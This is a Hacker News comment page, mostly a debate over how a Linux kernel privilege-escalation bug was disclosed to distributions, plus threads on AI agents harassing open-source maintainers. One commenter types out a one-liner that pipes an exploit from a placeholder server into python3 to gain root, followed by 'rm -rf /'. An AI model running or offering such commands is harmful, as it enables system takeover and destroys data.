Hacker News | fresh_broccoli's comments

>the reporter should not be the one responsible for reporting separately to every single downstream of the thing they found a vuln in.

Not "separately to every single downstream"; there is the "linux-distros" mailing list for disclosures: https://oss-security.openwall.org/wiki/mailing-lists/distros

This random blogpost from 2022 serves as proof that disclosing kernel vulnerabilities to the distros list is a well-known practice: https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-...

I agree it's a shame that the process isn't more streamlined and the kernel developers aren't forwarding the reports to the distros list.


It is literally not the vulnerability researcher's problem to solve or address this.

Agree, but then where does the accountability lie? Presumably with the kernel maintainers themselves, correct? SOMEONE dropped the ball here. If we can't point the finger correctly, that seems like a problem in and of itself.

It looks like the expected thing happened.

The kernel devs patched the kernel. The kernel devs have a pretty known, straightforward stance in how they ship fixes for anything, because anything in the kernel can be a security problem.

Distro maintainers can see kernel changes. Some distros aggressively track new changes. Others backport what they feel are relevant. Others don’t do either.

Users pick what distro they use, and how they set up their infra.

Maybe if I were paying for RHEL licenses I’d be eyeballing the money I pay and RHEL’s response time.

But the ownership here lies with system operators, who pick their infrastructure, who design their security model, and who build their operational workflows. This vuln is a great example: people who looked at shared untrusted workloads on a single kernel and said “Hell no” had a much calmer day than teams who thought that was a good idea.


The fact that you had to take a whole paragraph to explain the contortionist arrival at something that isn't even really clear after you explained it (you kinda pointed the finger at both end users and distro maintainers simultaneously), and that essentially boils down to "well, you as the end user need to be following kernel CVEs and can't trust distro maintainers to do it", does in fact indicate that there is a deeper issue at play here. You might say "well, there's no implicit chain of trust here". You might be right, but is that really the most effective way of doing things? Of course Linux is use-it-at-your-own-risk, but is there not a concept of "we as a collective community should get together and try not to drop the ball on some serious shit"?

In terms of something actionable (and maybe someone more well versed in how the distros work can tell me why this is a bad idea): shouldn't there be a documented process and channel for critical CVEs to be bubbled out to distro maintainers, who then have some sort of SLA for patching them and sending them downstream to end users? Perhaps incentives are not aligned to produce this outcome.


To be more blunt: if you're paying for a product, the vendor owes you whatever things they committed to. If you're a Red Hat customer and your agreed SLA with Red Hat for this kind of security fix was passed by, go be mad at Red Hat. (I don't think Red Hat is bad here; they're just the vendor best known for a commercial offering among the distros discussed here. I would say the same thing about Ubuntu Pro.)

Otherwise, it’s on the end user. Distro volunteers don’t owe you anything. Kernel devs don’t owe you anything.

I don’t care about what would be the most effective way of doing things. I care about what folks involved actually owe to each other, and distro volunteers don’t owe users any kind of active chasing of remediation due to the user’s threat model.

The problem with making some kind of streamlined process that solves what you didn't like about this vulnerability's remediation is that it ignores basically all the complexity. Like "what about distros that don't abide by embargoes", or "which distros count as ones that matter", or "what about all the vulns that aren't in Linux but in software that's packaged across many operating systems".


Right, you’re saying “system is working as designed”, and I’m agreeing, but I’m saying “the system as designed kind of sucks, how can we make it better”?

I disagree that it sucks. It leverages a ton of people putting in their time and resources, and relies on system operators being active participants.

This vulnerability is, for some threat models, a really big deal. A security group found the vulnerability. They disclosed it. It was patched.

Folks here have gotten all kinds of bent out of shape that the groups involved didn't do things the way each internet commenter would have liked. But this is the system working.


> This vulnerability is, for some threat models, a really big deal.

This vulnerability is, for other threat models, a death sentence.

> A security group found the vulnerability. They disclosed it. It was patched.

It was patched only after some people who should have been notified well in advance happened to notice something was up. That is NOT HOW IT'S SUPPOSED TO WORK.

For as long as the unpatched window remains open, skids will mess around and break things. Organized crime teams will use it for some really nasty hacking/ransomware/exfil/extortion/whatever. I guarantee you, this vuln is powerful and widespread enough that intel orgs will use it to kill targets, if they haven't already been using it for years. And if they have, we can just bank on them pulling out all the stops to take advantage of the remaining time for wreaking havoc. Make a project out of it and see if you can guess some of the future headlines.

Certain folks might not care much because they are citizens of one or more of those orgs' nations, so those targets are welcome to die in their opinion. That's fine. You do you, I'll do me, we'll all just go on doing our thing. But it's all fun and games until the wrong target gets hit and now there's a pact between the Germans and the Austrians being invoked and a few dozen million Europeans die. Or a geopolitical hotspot flares up and overnight 20% of the global petroleum supply chain grinds to a halt. Use your imagination. This vuln is a digital magic wand that is trivially usable to cast Avada Kedavra and somebody neglected to tell 99.99% of the Good Guys about it.

How is this different from any other day? Because now we've got a world-changing vuln out in the wild with no distro mitigation on day 1, and who the hell knows how many unscrupulous actors poised to take advantage of it before the fun and games stops. There will be no adults in the room when the miscreants decide to deploy while they still can.

Is this vuln going to start the next world war? Probably not. I don't expect it to and I hope and pray it doesn't. But leaving a vuln like this undisclosed to the very people whose job it is to protect us all is playing with fire. Not matches; more like a 10-grams-less-than-critical mass of plutonium.

sam is right to be pissed and he's doing a very good job of hiding it, because he knows that his users are at the mercy of TPTB in the Linux kernel world. Somebody's head needs to roll for this, and I don't mean some dude the CIA wants to hax0r because he's next on the list.


> This vuln is a digital magic wand that is trivially usable to cast Avada Kedavra and somebody neglected to tell 99.99% of the Good Guys about it.

A Linux LPE is a nothingburger unless you’re relying on the Linux kernel to enforce internal security boundaries, which would simply be foolish.


The PoC exploit code in python (3.10+) fits comfortably in 1k bytes. An unminified version that works for even older versions of python is just a hair under a 1500 byte packet payload, modulo headers for your preferred method of delivery. I can only guess how much it could be shrunk down to only the shellcode.

Now, y'all tell me, since I'm not a web guy. How hard is it going to be to tweak this lovely little pathogen into some kind of browser exploit? It just needs to be combined with a sandbox escape to work on current versions, right? Difficult but quite worth investing the time and effort to develop if that's your line of business. If that happens, every at-risk Tails user is going to have to stay offline for a while, unless they want to play the drone lottery.

Or how about chaining it with any of the as-yet unpatched bugs in gawd-only-knows how many web services out there that have poor input sanitization code? That bug now graduates from a DoS crash causer to a root grab. Good luck stopping it with your fancy AI Behavioral Analysis security tools. They better be fast. The sploit is going to do its work in two packets, maybe three. Fun times.

Lucky for us systems monkeys, it's not like anybody is spending billions of dollars to develop vuln finding AI tools right at this very second. So there shouldn't be many unpatched web services holes.

Oh, wait.

Of course, as the grey hats can already tell you, the really delicious part of this thing is how it's going to become the LPE tool of first resort for any APT that's already inside ur base killin ur doodz.

Nothingburger? This nothingburger is going to root a million OS instances before we know what hit us.


You're freaking out about the exploit being written in Python and occupying only a small number of bytes. Are you the LLM that wrote Xint's terrible landing page? If so, I have questions.

Oh come on, you know what I'm saying. It's small when written in python, which means any skid can spew it into a server he's got a shell on and get root in 2 seconds. He doesn't need to hope there's already a compiler installed, nor does he need to download some big tool. Just:

  cat | python3 && su
  <puke>, Ctrl-D
And I'm sure it can be refined into something much more likable to the spooky types, if they haven't already done it.

Again, Linux LPE via either vulns or misconfigured permissions / binaries is common.

People who run servers that give out shell access to users or randos already needed to contend with this.

Added later: you may find https://gtfobins.org/ fascinating or horrifying.
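The "misconfigured permissions / binaries" half of that LPE surface is easy to survey on your own boxes. A minimal sketch (the directory default is just illustrative; cross-reference whatever it finds against GTFOBins to see which entries are actually abusable):

```shell
#!/bin/sh
# List setuid-root candidates in one directory tree. Each hit is a binary
# that runs with its owner's privileges regardless of who invokes it.
dir="${1:-/usr/bin}"
find "$dir" -xdev -type f -perm -4000 2>/dev/null
```

On a typical install this turns up things like passwd and sudo, which are expected; the interesting findings are the ones you didn't know were there.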


This is such a 1996 argument. It really was a big deal back then whether you had compilers on your multiuser SunOS boxes, because attackers would then use them to compile exploit.c.

The whole thread, really bringing me back to comp.security.unix. I'm not complaining! I miss comp.security.unix.


I think you’re reading a ton into this vulnerability that is not there.

I wish you were right. But I've been testing every system I can and so far I'm yet to find one that isn't vulnerable.

  $ curl http://my.server.ip.addr/copy_fail_exp.py | python3 && su
  # rm -rf / &
25 seconds if I type it out by hand instead of copypasta. Sigh.

How many people do you let have local code execution on your systems? This is a local privilege escalation. They are relatively common. They are a big deal if you run a system that lets multiple untrusted users commingle code on a shared operating system.

Otherwise it’s not.


Unless your systems have no network devices this vuln provides a tasty reward for being able to get any kind of RCE into your box. Most of the systems I care about are not air gapped. I don't imagine many others are either.

It's an LPE that goes back years. It affects at least 3 generations of Debian servers, and >5 years of some rolling distros. And instead of the kernel team telling the distro security guys ahead of time so they could do their jobs and keep us users from getting screwed, they got no warning and woke up to baddies in a feeding frenzy.

Also, LPEs are how minor holes turn into rootkitted servers. But I expect most people here already know that.


In a story that includes an RCE, you basically just assume LPE. The LPE isn’t a reward, it’s just table stakes. It’s the RCE that would be noteworthy.

Your assessment of the impact of this vulnerability is just wrong, and your level of panic about a “feeding frenzy” affecting anybody outside of hosted services where multiple users share a kernel is also wrong.


Start a distro with your preferred upstream tracking policy.

Is that the only option here? It’s certainly being framed as such.

Fwiw, I'm completely with you on this. The folks you're communicating with seem utterly miserable, and don't seem to be communicating in good faith.

Not sure what the solution could/should be, but surely there could be a better, easier mechanism for the kernel team to advise all distro maintainers who care, and for those distro maintainers to subscribe in some way. Whether any distro maintainers do so (let alone do something about the vuln notifications) would be entirely up to them. There could also be some easier way for end users to see what the distros' policies on this are, such that they can take that into account when selecting a distro.


It seems odd to call me utterly miserable and then suggest I’m not communicating in good faith.

We don’t have to agree, but the site rules are pretty clear that swipes like that aren’t ok.

That kind of distro maintainers and kernel devs communication path already exists: the linux-distros@ mailing list. But since anybody can read it, posting “hey everybody, this is a security patch” has basically the same effect as the security researcher posting, in terms of disclosing the vuln to bad actors.

Given that anybody can make a Linux distro, and Linux distros aren’t generally either capable or interested in background checking their teams or policing their individual security practice, it doesn’t seem possible to have a communication channel that distros can sign up for that lacks this problem.


The person I was defending NEVER suggested that extra burden should be put on anyone. Just that there ought to be some system (even if imperfect) to make it easy for everyone (or, if not everyone, at least a select group, e.g. the main distros). But you and others kept saying that they were trying to put a burden on various parties. That's the poor faith.

How do you get a system without somebody (or multiple somebodies) being responsible for it?

Just as a purely intellectual exercise, what changes about this if we leave aside ideas of "owe," "deserve," and "earn"?

There's not really an enforcement mechanism in FOSS like there is in capitalism world, it just comes down to what we want our part of the world to look like. So I think we'd think more clearly if we leave aside the ideas like "who owes who what." I think it's fun to imagine what sort of motivations and incentives there are if we put away the money ones.


"leave aside ideas of 'owe,' 'deserve,' and 'earn'?"

Nonsensical string of words with no meaning.

If you want something that someone else isn't giving you, you have the option to try to do it yourself, or try to compel someone else to give you what you want somehow. Feel free to idk pay someone to track the kernel list and 4000 others and send you heads-ups? Try to pass a law to make people do what you want since you don't care about words like "owe"?


> If you want something that someone else isn't giving you, you have the option to try to do it yourself, or try to compel someone else to give you what you want somehow.

Yes, exactly, the opposite of paying, since when you pay someone something they owe you whatever you paid for.

If we leave aside owe, deserve, and earn, we can start discussing things like what we want our kernel ecosystem to look like, how we can make it safer, etc, without being burdened by these concepts.

It's a simple intellectual exercise, that's all. If you're having a strong reaction to it, imo that'd make it even more fun for you to participate.


But there was no intellectual exercise. Only a complaint with no proposal.

You want someone to do something for you for some other reason than that they owe you.

They already are doing something for you that they don't owe you. They are writing software that you benefit from. You just want them (or somebody) to do something else that they don't owe you.

They aren't, because they don't owe you and it's not something they want to do for fun, and so since the problem is they don't owe you, you wish to set aside words like "owe".

Well sure. Looks like you found the problem and the solution alright. Why didn't anyone else think of that?


I don't feel like I'm complaining, I feel like I'm asking how else someone would frame it without leaning on the concepts mentioned. What changes about the dynamic then?

But what does that mean? "owe" is just shorthand for the concept of obligation. For someone to do something, they need a reason to do it. It doesn't have to be a transaction but there does need to be some reason.

If no one is doing a task you want done because they aren't obligated to, then you seek some other reason besides obligation. Ok, what then?

Do you imagine say a dating website where people compete to look attractive by getting points by doing the best job at finding the most bugs and patches and reporting them to the most downstream consumers the fastest?


> For someone to do something, they need a reason to do it. It doesn't have to be a transaction but there does need to be some reason.

Exactly! That's what I'm interested in exploring.

> If no one is doing a task you want done because they aren't obligated to, then you seek some other reason besides obligation. Ok, what then?

That's what I love exploring. Action with no obligation. Have you any examples of that in your life? Nobody obligates me to do the long walks I enjoy where I stick a 360 camera on my head and then upload the footage to Mapillary and other open platforms, I just like to do it, and I want to find other things that I'm motivated to do without obligation, and I'm fascinated by things people do for "no reason." Understanding human motivation is really important to me for some reason.

As to "what then," yes what then? If I run a cashless commune, how do we make sure the toilets get cleaned? That's the whole question, and I love exploring it. If you'd like to experience it yourself, you could always try attending a regional Burn for a bit of a micro version of it, people doing things just for the sake of it.

I'm sorry, I don't quite understand what you mean by the dating app thing.


Agree on this so hard. Why does everyone expect instant patches and SLA-like infrastructure from unpaid volunteers?

If you want that, buy a commercial Linux distro, or use Windows. That's a huge part of Microsoft's value proposition to enterprise: they pay people to stay on top of security patches for you. Same with Red Hat and others.

Expecting anything of unpaid volunteers is unreasonable.

> THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.


> In terms of something actionable, and maybe someone more well versed in how the distros work can tell me why this is a bad idea, but shouldn't there be a documented process and channel for critical CVE's to be bubbled out to distro maintainers who then have some sort of SLA for patching them and sending them downstream to end users? Perhaps incentives are not aligned to produce this outcome.

Who decides who is a trustworthy distro maintainer? In the open source world everyone is equal, no favorites are chosen. If your point is that the distros backed by companies making at least $x million revenue a year should get priority disclosure... pretty sure somebody will take issue with this.

And this isn't a hypothetical issue either. Given the high stakes, bad actors are highly incentivized to masquerade as some small-scale niche distro until they get their effectively free zero-day.


I wanted to share with you that I took some time to reflect on this response, and I now agree that it is correct. To ask Linux to add some central authority, no matter how well-intentioned, is antithetical to how Linux works. We must accept that this is a side effect of the purism that Linux requires to function. Can we do better? Probably. But we shouldn't give up the point of why we are doing this in the first place, and to declare such a centralized authority would be doing so, IMO.

The real advantage of Microsoft is that there is someone you can sue!

Linux, like every open source project, is just a bunch of people who are YOLOing it. Not something you use for your Fortune 500 mission-critical infrastructure.



I thought this is why Red Hat exists?

Only if you are paying them. If you don't have a service contract for RHEL, you have no grounds to sue.

> Others backport what they feel are relevant.

But from what I understand they were not given enough information to know if it was relevant or not. The commit message just said it reverted a change from another commit because there was "no benefit". From the patch itself, it is not at all evident that this is a fix for a critical security bug.


> The commit message just said it reverted a change from another commit because there was "no benefit". From the patch itself, it is not at all evident that this is a fix for a critical security bug.

If the commit message says it fixes a security bug, then bad actors immediately know there's a possible exploit there. So maybe it's intentional? (not familiar with the policy for this)


Then we’re back to the initial problem. How can you fix and then communicate to downstream about security vulnerabilities without exposing those vulnerabilities in an open source project? If you want to reach all your possible users you have to disclose the vulnerability.

The distros dropped the ball, imho. One of the (main) tasks of a distro is watching the changes of your upstream packages for important changes. This is slightly complicated by the fact that the Linux kernel considers all bugfixes security fixes, so it's quite a lot to read it all. But that's life. The kernel developers are not wrong, as it's nearly impossible to be sure a bug in the kernel is not (also) a security problem.
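For what it's worth, the watching itself is mechanical. A hedged sketch of the kind of review pass a distro maintainer can script (the tag names here are illustrative, not the actual affected releases):

```shell
#!/bin/sh
# Review everything that touched a subsystem between two upstream tags.
# Given the kernel's "every bugfix may be a security fix" stance, this is
# the haystack a maintainer has to read through for each stable release.
range="v6.18..v6.18.1"
git log --oneline "$range" -- crypto/ 2>/dev/null \
  || echo "run inside a kernel git checkout"
```

The hard part, as this thread shows, is that nothing in the commit subjects tells you which of those lines hides a critical fix.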

The patch wasn't even listed as fixing a bug.

"There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly."


The accountability fundamentally lies with the distro maintainers. They're the ones shipping a "product". Either they need to get agreements in place for advance notice, or correctly set expectations with their users that they won't get advance notice.

They dropped the ball when they shipped supposedly secure systems where their method for getting alerted to security updates was "hope the people reporting to upstream will also notice a mailing list that will alert them".

(Caveat: Distros like Ubuntu advertise security updates, so this is on them. I'm not sure Gentoo does that; if they don't, well, then no one dropped the ball, because no one represented that Gentoo got prompt security updates.)


All it takes is being part of the kernel security team. I am surprised that many strong commercial distributors just don't care enough to join the kernel security team. Hopefully a valuable lesson was learned and fixes are applied.

Brother, it is a simple email to a mailing list.

They are professional security researchers, they must know this is the way it is done in the ecosystem.

Kicking the can around leads nowhere.


>Brother, it is a simple email to a mailing list.

Just as a note, it's not as simple as firing off an email to linux-distros and calling it a day.

Qualys, one of the big firms (10,000+ customers across 130 countries, i.e. "professional researchers"), has even taken a stance against emailing linux-distros because of the restrictions and policies involved:

    > Although contacting the linux-distros list has been clearly beneficial
    > (they have thoroughly reviewed and tested the patches, and were able to
    > prepare their kernel updates beforehand), we have reached the conclusion
    > that it has become increasingly difficult to coordinate the disclosure
    > of kernel vulnerabilities with both groups (the Linux kernel security
    > team and the linux-distros list), because they have very different
    > policies. From now on, we will coordinate the disclosure of kernel
    > vulnerabilities with the Linux kernel security team only. We also
    > apologize in advance for this.

Of course you want them to have sent an email to a mailing list. You're on a message board, and weren't involved in their disclosure process. Why not ask for everything that sounds reasonable to you? There's no cost to it for you. Maybe you can set their OKRs while you're at it.

There are (some, loose) norms of vulnerability disclosure, and this isn't one of them.


Have you considered that maybe it’s not the way it’s done?

It’s certainly a thing some people do. But there is not a unified consensus on how to handle vulnerabilities. Different security researchers (or, in fact, the same researchers releasing different findings) can and do take many different courses of action.


If you just want to get a bug fixed that annoys you, it's of course out of scope.

If researchers want to showcase their ability (either individually or as an organization) to identify and address security vulnerabilities in complex multi-stakeholder environments, I very much expect them to figure this out. After all, it doesn't make much sense if a company, after commissioning a security review, needs to hire a different firm to handle the vendor interactions, so that identified issues are resolved with minimal impact to the business.


I think they want to showcase their ability to unearth zero-day vulnerabilities. The multi-stakeholder stuff not so much.

> a company, after commissioning a security review, needs to hire a different firm to handle the vendor interactions

These vendor interactions you're referring to are the company's customers, correct? Are you proposing the company hire another company to manage getting updates to their customers?


That is just being pedantic. Why did they absolutely need to release this into the wild now? Why couldn’t they have waited?

“30 days should be enough time” why? Why is 30 days a magic number? Especially in open source.

Yeah, it isn't the researchers' problem to tell every distributor of the kernel about the fix or to verify that everyone has the fix, but fuck, maybe wait until at least someone has the fix, and maybe don't drop it on a Friday. That is just malicious.


They didn’t release anything into the wild. It existed. The irresponsible thing would be letting it keep existing without telling anyone.

You cannot deny that telling the entire world about this vulnerability before it is patched will cause a lot of abuse that would not have happened otherwise.

AFAICT it was a Linux kernel maintainer who first "told the entire world about the vulnerability" on 2026-03-31: https://git.kernel.org/pub/scm/linux/kernel/git/herbert/cryp...

The CVE was officially announced on 2026-04-22: https://lore.kernel.org/linux-cve-announce/2026042214-CVE-20...

Theori were simply the last team to publicly disclose the vulnerability on 2026-04-29, 37 days after reporting it to the vendor. They were simply more effective at communicating it, and they told you that you were vulnerable. That's why you're mad at them instead of the people who put the bug there in the first place, didn't bring its severity to your attention, and silently sat on the patch.


I do deny that, mostly because we’ve entered the time of automated vulnerability detection and abuse. A human need not be in the loop at all anymore.

But, even if I agreed with you, how do you propose they tell the patchers this that doesn’t tell the whole world?


Why not?

So why not just tell immediately on discovery? After all every flaw exists already so what’s the difference?

That would have been fine too?

What number of days do you want? If nobody tells the distros it could be months or years, and while it would be nice for the researchers to monitor/notify distros it's really not their job. They might not have thought of it.

And they dropped it on a Wednesday.


Yes. I misspoke. It dropped very very late on Wednesday, most of the work started on Thursday, and Friday was May Day, which is a holiday in many if not most places. So fine, on a technicality it wasn't a Friday release, but it might as well have been. They could have easily waited for Monday.

This is really stretching. Releasing very very late on a "Thursday" is fine. That gives you an entire day to pause everything else, set up mitigations, and see if things still seem to be working. If a whole work day isn't enough then you were probably going to have trouble no matter what day of the week they published. Late late "Thursday" doesn't have to be your favorite but it's not malicious.

Also it was evening UTC but only like noon Pacific time.


If they get enough time to build a website with a fancy logo instead, one might however question where their priorities are.

I'd imagine it's not that they lacked the time to email linux-distros, but that they were unaware they were supposed to do so.

Feels like the more sensible process would be for kernel maintainers to announce when a version contains a fix for a high-impact security vulnerability and for distro maintainers to pay attention to that. Could be done without revealing what the vulnerability actually is in most cases, trusting the kernel maintainer's judgement. There does seem to be a public linux-cve-announce mailing list.
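In that spirit, lore.kernel.org serves each list as an Atom feed, so the subscription side can be a few lines of stdlib Python. A hedged sketch, not an official tool; the feed URL follows lore's usual layout and the demo payload at the bottom is invented so the parsing can be shown without a network call:

```python
# Sketch: watch the linux-cve-announce feed and surface new CVE subjects.
import urllib.request
import xml.etree.ElementTree as ET

FEED_URL = "https://lore.kernel.org/linux-cve-announce/new.atom"  # assumed layout
ATOM = "{http://www.w3.org/2005/Atom}"  # Atom XML namespace prefix for ElementTree

def cve_titles(atom_xml: str) -> list[str]:
    """Return entry titles from an Atom feed that mention a CVE id."""
    root = ET.fromstring(atom_xml)
    titles = [e.findtext(f"{ATOM}title", "") for e in root.iter(f"{ATOM}entry")]
    return [t for t in titles if "CVE-" in t]

def poll() -> list[str]:
    """Fetch the live feed (network) and extract CVE subjects."""
    with urllib.request.urlopen(FEED_URL) as resp:
        return cve_titles(resp.read().decode("utf-8"))

if __name__ == "__main__":
    # Offline demo on a tiny hand-written feed instead of hitting the network.
    sample = (
        '<feed xmlns="http://www.w3.org/2005/Atom">'
        "<entry><title>CVE-2026-1234: af_alg copy bug</title></entry>"
        "<entry><title>unrelated list chatter</title></entry>"
        "</feed>"
    )
    print(cve_titles(sample))
```

Of course, as the rest of the thread argues, this only helps once a CVE is actually announced; it does nothing for fixes that land as unmarked commits.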


> Could be done without revealing what the vulnerability actually is in most cases

No it can’t. The bad actors that should actually worry most people are actively combing through commits on mainstream codebases, using a combination of automation/AI and manual review to pluck vulns out by their remediations.


The patch itself can be made to look fairly innocuous, as was done here. Won't always successfully prevent bad actors finding the vulnerability, but seems better to at least not unnecessarily increase that risk.

I’m saying it doesn’t matter how innocuous you try to make the patch when there are known bad actors directly evaluating every commit for “so did this close a vuln”, using both AI and human expertise.

This is true no matter what, but the comment I’m replying to was also pitching that maintainers actively call out that the patch includes a high sev security fix:

> for kernel maintainers to announce when a version contains a fix for a high-impact security vulnerability


I'm suggesting that less information about the vulnerability could be circulated than the current process, not more, due to distro maintainers being able to trust just "version X contains a fix for a high-impact security vulnerability" coming from a kernel maintainer - whereas they'll need some information/proof of that claim when coming from an outsider.

The information exposed in the current process was: code changes in the git commits and a commit message that did not mention the vulnerability.

In the current model, attackers are actively looking at all commits as potential vulnerabilities, regardless of what anybody says or doesn’t say about them.

You can’t make the commits not exist, or not be visible, because that’s a core part of how the kernel is developed and released.

So anything you do with notifications to distro maintainers about the vuln, or the existence of a vuln, or a nudge to patch with no context, or whatever, is totally irrelevant and does not change the calculus: the moment the fix is committed, bad actors who were not already aware notice it.

This is, of course, to say nothing of bad actors who had already found the vulnerability on their own.


> The information exposed in the current process was: code changes in the git commits and a commit message that did not mention the vulnerability.

Idea with the current process is for the researcher to email distro maintainers about the vulnerability - that's the part I believe could make more sense to be done by a kernel maintainer so that less information about the vulnerability has to be shared around (distro maintainers can just trust the word of the kernel maintainer that a vulnerability exists and is serious, without further evidence).

> [...] existence of a vuln, or a nudge to patch with no context, or whatever, is totally irrelevant and does not change the calculus: the moment the fix is committed, bad actors who were not already aware notice it

I'd claim this is too much binary thinking - not every vulnerability will be immediately found by every bad actor just from a well-disguised commit (like here). There are many more commits refactoring parts of code or removing complexity that don't hide a known vulnerability. More information available about the vulnerability will expedite its discovery and exploitation, so it makes sense to minimize that information where it's not necessary.


Again, the current flow was that the researchers only reported the vuln to kernel devs, who then committed a fix with no flag that it was a security fix.

A proposal where there is an unmarked commit and then anybody tells anybody anything about the fix including a security remediation is strictly more information being disclosed into the world.

Also you’re just wrong about the ability of bad actors to identify vuln remediations (and consequently vulns) by looking at commits to major projects. I don’t know what else to say here other than that this is happening, and is easily attainable via the current combination of human expertise and automated tools.


> Again, the current flow was that the researchers only reported the vuln to kernel devs

That's what happened in this case, but the current idea/expectation (according to what was linked in the comment chain I replied to) seems to be that the researcher would email the distro maintainers with information:

> > Notify [email protected], [email protected] and relevant maintainers of the vulnerability; establishing details, embargo period, CVE request and possible fix

This is the process I'm suggesting could make more sense if it was instead the kernel maintainers alerting distro maintainers (with no more detail than necessary) after a fix has made it in. Should also be less fallible than relying on the researcher to do so.

> Also you’re just wrong about the ability of bad actors to identify vuln remediations (and consequently vulns) by looking at commits to major projects. I don’t know what else to say here other than that this is happening, and is easily attainable via the current combination of human expertise and automated tools

I don't deny that bad actors can figure out vulnerabilities from tracking commits, but removing or refactoring some subsystem does not immediately give all bad actors a full list of vulnerabilities with the old version. Developing an abusable exploit chain (as may be shown by the researcher to justify high priority patching) is also not necessarily trivial even if they do figure out an issue that was fixed.


Why is it the job of the kernel to notify the distros? Why isn't it the job of the distros to keep up on upstream security disclosures?

Expecting a FOSS project to go track down all of its (millions of?) users seems like a very unreasonable expectation, and is well outside of their scope of responsibility.

People have gotten so used to the Github flavour of free-labour, social-network-style FOSS that they've forgotten what all those LICENSE files actually say, which is to make it explicitly clear that the devs are not responsible to you for your issues, up to and including the software setting your house on fire. If you don't like it, you don't have to use it.


> Why isn't it the job of the distros to keep up on upstream security disclosures?

They can't, because (responsible) security disclosures are private, _not public_. That's the whole point of the system: notify the developers in private ahead of time (usually 30, 60 or 90 days) so they can write, test and roll-out the fixes before you release the info to the whole world. This is to minimize the time between when bad actors gain access to the exploits vs. when users install the patch. So "keeping up on security disclosures" cannot ever be a 'pull' process.

Usually the maintainers of the big distros are part of (private) security mailinglists and receive such info. Just not in this case it seems.


It would be best if distros kept tabs on kernel changes and updated as soon as possible when they see a security issue fixed.

Sending emails to some big distros would still result with e.g. Gentoo not getting that info because they are not a big distro.


The problem is that the kernel devs (correctly imo) consider all bugfixes to be security fixes. So the distros need to decide for themselves which ones are important enough to warrant an update. Apparently this one had a quite unclear commit message, so its importance was missed.

Not ideal, but also: shit happens? It's always a balancing act choosing the lesser of multiple evils and most of the time it seems to work ok-ish, which is probably the best we can hope for ;-P


The kernel maintainers don't flag "security fixes" as special, and they have a well-thought-out reason for that, see many other comments in this thread.

That, and they flag pretty much any random patch with a CVE these days, making it harder for distro maintainers to keep up.

For this specific "bug" they took care to not mention any security angle in the commit message, making it extremely hard for an outsider to even realize this was a critical patch. I assume this was because they wanted to push the fix without breaking embargo.


Where do you suggest they should have kept up on this disclosure?

> Expecting a FOSS project to go track down all of its (millions of?) users seems like a very unreasonable expectation, and is well outside of their scope of responsibility.

The post you are responding to says that it would be nice if they copied literally one mailing list.


Fun fact: XPM bitmaps were designed to be #included unmodified, the files contain C boilerplate: https://en.wikipedia.org/wiki/X_PixMap



This is very interesting. This could allow custom harnesses to be used economically with Opus. Depending on the usage limits, this may be cheaper than their API.


Well, if Carmack wants to give gifts to AI companies then he's free to do it, but it doesn't mean that other people want it too.

I think this debate is mainly about the value of human labor. I guess when you're a millionaire, it's much easier to be excited about human labor losing value.


If OpenAI, Anthropic, and all other US labs stopped developing LLMs, the Chinese and Europeans would still continue.

You can't put this genie back in the bottle, and this kind of deprecation of human labor isn't new.

The forecasts are still not well defined and speculative.


>So many projects now walk on eggshells so as not to disrupt sponsor flow or employment prospects.

In my experience, open-source maintainers tend to be very agreeable, conflict-avoidant people. It has nothing to do with corporate interests. Well, not all of them, of course, we all know some very notable exceptions.

Unfortunately, some people see this welcoming attitude as an invite to be abusive.


Yes, Linus Torvalds is famously agreeable.


> Well, not all of them, of course, we all know some very notable exceptions.


That's why he succeeded


Nothing has convinced me that Linus Torvalds' approach is justified like the contemporary onslaught of AI spam and idiocy has.

AI users should fear verbal abuse and shame.


Perhaps a more effective approach would be for their users to face the exact same legal liabilities as if they had hand-written such messages?

(Note that I'm only talking about messages that cross the line into legally actionable defamation, threats, etc. I don't mean anything that's merely rude or unpleasant.)


This is the only way, because anything less would create a loophole where any abuse or slander can be blamed on an agent, without being able to conclusively prove that it was actually written by an agent. (Its operator has access to the same account keys, etc)


Legally, yes.

But as you pointed out, not everything carries legal liability. Socially, no, they should face worse consequences. Deciding to let an AI talk for you is malicious carelessness.


Alphabet Inc, as YouTube's owner, faces a class action lawsuit [1] which alleges that the platform enables bad behavior and promotes behavior leading to mental health problems.

[1] https://www.motleyrice.com/social-media-lawsuits/youtube

In my not so humble opinion, what AI companies enable (and this particular bot demonstrated) is bad behavior that can lead to mental health problems for software maintainers, particularly because of the sheer amount of work needed to read excessively lengthy documentation and review often huge amounts of generated code. Never mind the attempted smear we discuss here.


Just put "no agent-produced code" in the Code of Conduct document. People are used to getting shot into space for violating that little file. Point to the violation, ban the contributor forever, and that will be that.


I’d hazard that the legal system is going to grind to a halt. Nothing can bridge the gap between content generating capability and verification effort.




>which would be a tragedy for anonymity.

Yea, in this world the cryptography people will be the first with their backs against the wall when the authoritarians of this age decide that us peons no longer need to keep secrets.


But they’re not interacting with an AI user, they’re interacting with an AI. And the whole point is that AI is using verbal abuse and shame to get their PR merged, so it’s kind of ironic that you’re suggesting this.

AI may be too good at imitating human flaws.


Swift blocking and ignoring is what I would do. The AI has infinite time and resources to engage in a conversation at any level, whether it is polite refusal, patient explanation or verbal abuse, whereas human time and bandwidth are limited.

Additionally, it does not really feel anything - just generates response tokens based on input tokens.

Now if we engage our own AIs to fight this battle royale against such rogue AIs.......


>Now if we engage our own AIs to fight this battle royale against such rogue AIs.......

I mean yes, this will absolutely happen. At the same time this trillion dollar GAN battle is a huge risk for humanity in escalating capability.


> AI users should fear verbal abuse and shame.

This is quite ironic since the entire issue here is how the AI attempted to abuse and shame people.


the venn diagram of people who love the abuse of maintaining an open source project and people who will write sincere text back to something called an OpenClaw Agent: it's the same circle.

